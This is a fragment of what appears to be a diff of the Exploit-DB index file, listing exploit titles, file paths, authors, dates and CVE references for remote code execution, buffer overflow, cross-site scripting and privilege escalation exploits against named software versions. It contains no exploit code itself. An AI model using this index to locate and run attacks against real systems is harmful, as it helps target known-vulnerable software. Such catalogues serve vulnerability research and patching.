32200,exploits/php/webapps/32200.txt,"Yogurt Social Network 3.2 rc1 Module for XOOPS - 'album.php?uid' Cross-Site Scripting",2008-08-09,Lostmon,webapps,php,,2008-08-09,2014-03-12,1,CVE-2008-3668;OSVDB-47643,,,,,https://www.securityfocus.com/bid/30618/info
@ -34116,11 +34134,13 @@ id,file,description,date_published,author,type,platform,port,date_added,date_upd
41720,exploits/python/remote/41720.rb,"Logsign 4.4.2/4.4.137 - Remote Command Injection (Metasploit)",2017-03-24,"Mehmet Ince",remote,python,,2017-03-24,2017-04-04,1,,"Metasploit Framework (MSF)",,,,https://github.com/rapid7/metasploit-framework/blob/a93aef8b7adecc4059c6cf168dd181e169cbc0b2/modules/exploits/linux/http/logsign_exec.rb
46075,exploits/python/remote/46075.rb,"Mailcleaner - (Authenticated) Remote Code Execution (Metasploit)",2019-01-07,"Mehmet Ince",remote,python,443,2019-01-07,2019-03-17,0,,"Metasploit Framework (MSF)",,,,
41942,exploits/python/remote/41942.rb,"Mercurial - Custom hg-ssh Wrapper Remote Code Exec (Metasploit)",2017-04-27,Metasploit,remote,python,22,2017-04-27,2017-04-27,1,,"Metasploit Framework (MSF)",,,,https://github.com/rapid7/metasploit-framework/blob/bbee7f86b5c1bd8b2e245b98fce1cb858b327948/modules/exploits/linux/ssh/mercurial_ssh_exec.rb
51051,exploits/python/remote/51051.txt,"NVFLARE < 2.1.4 - Unsafe Deserialization due to Pickle",2023-03-25,"Elias Hohl",remote,python,,2023-03-25,2023-03-25,0,CVE-2022-34668,,,,,
46645,exploits/python/remote/46645.py,"PhreeBooks ERP 5.2.3 - Remote Command Execution (1)",2019-04-03,"Metin Yunus Kandemir",remote,python,80,2019-04-03,2021-02-05,0,,,,,http://www.exploit-db.comRelease5.2.3BizunoLib3.1.7.tar.gz,
50918,exploits/python/remote/50918.txt,"PyScript - Read Remote Python Source Code",2022-05-11,"Momen Eldawakhly",remote,python,,2022-05-11,2022-05-11,0,CVE-2022-30286,,,,,
50983,exploits/python/remote/50983.py,"rpc.py 0.6.0 - Remote Code Execution (RCE)",2022-07-29,"Elias Hohl",remote,python,,2022-07-29,2022-07-29,0,CVE-2022-35411,,,,,
42251,exploits/python/remote/42251.rb,"Symantec Messaging Gateway 10.6.2-7 - Remote Code Execution (Metasploit)",2017-06-26,"Mehmet Ince",remote,python,443,2017-06-26,2017-06-26,1,CVE-2017-6326,"Metasploit Framework (MSF)",,,,
37814,exploits/python/remote/37814.rb,"Werkzeug - Debug Shell Command Execution (Metasploit)",2015-08-18,Metasploit,remote,python,,2015-08-18,2015-08-18,1,OSVDB-126453,"Metasploit Framework (MSF)",,,,
51041,exploits/python/webapps/51041.txt,"_camp_ Raspberry Pi camera server 1.0 - Authentication Bypass",2023-03-25,"Elias Hohl",webapps,python,,2023-03-25,2023-03-25,0,CVE-2022-37109,,,,,
48886,exploits/python/webapps/48886.txt,"aaPanel 6.6.6 - Privilege Escalation & Remote Code Execution (Authenticated)",2020-10-16,"Ünsal Furkan Harani",webapps,python,,2020-10-16,2020-10-16,0,,,,,,
47497,exploits/python/webapps/47497.py,"Ajenti 2.1.31 - Remote Code Execution",2019-10-14,"Jeremy Brown",webapps,python,,2019-10-14,2019-10-14,0,,,,,,
48929,exploits/python/webapps/48929.py,"Ajenti 2.1.36 - Remote Code Execution (Authenticated)",2020-10-23,"Ahmet Ümit BAYRAM",webapps,python,,2020-10-23,2020-10-23,0,,,,,,
@ -40887,6 +40907,7 @@ id,file,description,date_published,author,type,platform,port,date_added,date_upd
50009,exploits/windows/local/50009.txt,"SysGauge 7.9.18 - ' SysGauge Server' Unquoted Service Path",2021-06-15,"Brian Rodriguez",local,windows,,2021-06-15,2021-06-15,0,,,,,http://www.exploit-db.comsysgaugesrv_setup_v7.9.18.exe,
44455,exploits/windows/local/44455.py,"SysGauge Pro 4.6.12 - Local Buffer Overflow (SEH)",2018-04-16,"Hashim Jawad",local,windows,,2018-04-16,2018-04-16,0,,,,,http://www.exploit-db.comsysgaugepro_setup_v4.6.12.exe,
49248,exploits/windows/local/49248.txt,"System Explorer 7.0.0 - 'SystemExplorerHelpService' Unquoted Service Path",2020-12-14,"Mohammed Alshehri",local,windows,,2020-12-14,2020-12-14,0,,,,,,
51044,exploits/windows/local/51044.txt,"System Mechanic v15.5.0.61 - Arbitrary Read/Write",2023-03-25,"Brandon Marshall",local,windows,,2023-03-25,2023-03-25,0,CVE-2018-5701,,,,,
43929,exploits/windows/local/43929.c,"System Shield 5.0.0.136 - Privilege Escalation",2018-01-30,"Parvez Anwar",local,windows,,2018-01-30,2018-01-30,0,CVE-2018-5701,,,,,
35812,exploits/windows/local/35812.py,"T-Mobile Internet Manager - Local Buffer Overflow (SEH)",2015-01-18,metacom,local,windows,,2015-02-03,2016-10-10,1,OSVDB-117457,,,,http://www.exploit-db.comwinui.zip,
38603,exploits/windows/local/38603.py,"TCPing 2.1.0 - Local Buffer Overflow",2015-11-02,hyp3rlinx,local,windows,,2015-11-02,2016-10-10,1,OSVDB-129810,,,,http://www.exploit-db.comtcping2.zip,http://hyp3rlinx.altervista.org/advisories/AS-TCPING-2.1.0-BUFFER-OVERFLOW.txt

Can't render this file because it is too large.